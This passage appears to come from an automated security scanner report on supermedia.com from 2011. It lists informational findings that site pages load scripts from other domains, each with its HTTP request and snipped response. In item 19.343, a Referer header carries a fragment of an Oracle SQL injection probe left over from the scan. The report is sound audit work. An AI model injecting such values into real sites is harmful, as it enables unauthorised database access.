User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762116|check#true#1296760316; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 39876


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Stores Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.325. https://www.supermedia.com/help/search-marketing-services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/search-marketing-services

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/search-marketing-services HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Search Marketing Services Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.326. https://www.supermedia.com/help/search-marketing-services/reporting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/search-marketing-services/reporting

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/search-marketing-services/reporting HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296764993|check#true#1296763193;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 20:29:45 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Search Engine Marketing Reporting | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.327. https://www.supermedia.com/help/telephone-service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/telephone-service

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/telephone-service HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:52 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Telephone Service Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.328. https://www.supermedia.com/help/terms-conditions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/terms-conditions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/terms-conditions HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:09 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Terms and Conditions | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.329. https://www.supermedia.com/help/web-hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/web-hosting

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/web-hosting HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:09 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Hosting Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.330. https://www.supermedia.com/help/web-site-design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/web-site-design

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/web-site-design HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:34:54 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Design Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.331. https://www.supermedia.com/help/yellow-pages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /help/yellow-pages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/yellow-pages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Yellow Pages Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.332. https://www.supermedia.com/local-search-marketing/do-it-yourself  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /local-search-marketing/do-it-yourself

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /local-search-marketing/do-it-yourself HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:09 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Do-it-yourself Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.333. https://www.supermedia.com/local-search-marketing/services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /local-search-marketing/services

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /local-search-marketing/services HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:30:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Search Marketing Services | SuperMedia.com Advertising</title>



...[SNIP]...
<!-- SMLocal
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Reporting
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.334. https://www.supermedia.com/marketing-success  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /marketing-success

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /marketing-success HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:35:10 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing Success | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.335. https://www.supermedia.com/media-network/affiliate-program  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /media-network/affiliate-program

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-network/affiliate-program HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Affiliate Program | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.336. https://www.supermedia.com/media-network/market-coverage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /media-network/market-coverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-network/market-coverage HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:36 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Market Coverage| SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.337. https://www.supermedia.com/media-network/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /media-network/mobile

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-network/mobile HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Mobile Applications | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.338. https://www.supermedia.com/media-network/online-ad-network  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /media-network/online-ad-network

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-network/online-ad-network HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:31 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia's Online Ad Network | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.339. https://www.supermedia.com/media-network/our-brands  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /media-network/our-brands

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-network/our-brands HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Brands | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.340. https://www.supermedia.com/media-network/sem-partners  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /media-network/sem-partners

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-network/sem-partners HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:33 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia's Search Marketing Partners | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.341. https://www.supermedia.com/national-agency-products/media-kit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /national-agency-products/media-kit

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /national-agency-products/media-kit HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:33:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Media Kit | SuperMedia.com Advertising</title>


<li
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.342. https://www.supermedia.com/online-advertising  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /online-advertising

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /online-advertising HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:29:52 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.343. https://www.supermedia.com/packaged-solutions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /packaged-solutions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /packaged-solutions HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761924|check#true#1296760124; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:09:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 24328


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Advertising Packages for Businesses | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.344. https://www.supermedia.com/packaged-solutions/auto-dealer-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /packaged-solutions/auto-dealer-packages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /packaged-solutions/auto-dealer-packages HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:32:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Auto Dealer Marketing Packages | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
